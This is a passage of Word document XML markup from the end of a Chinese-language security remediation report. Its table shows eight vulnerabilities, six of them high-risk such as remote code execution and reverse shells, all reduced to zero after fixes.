              <w:t>漏洞总数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>8项</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>0项</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>100%消除</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>高危漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>6项（RCE/反弹Shell等）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>0项</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>100%消除</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="999999"/>
        </w:rPr>
        <w:t>— 报告结束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微软雅黑" w:hAnsi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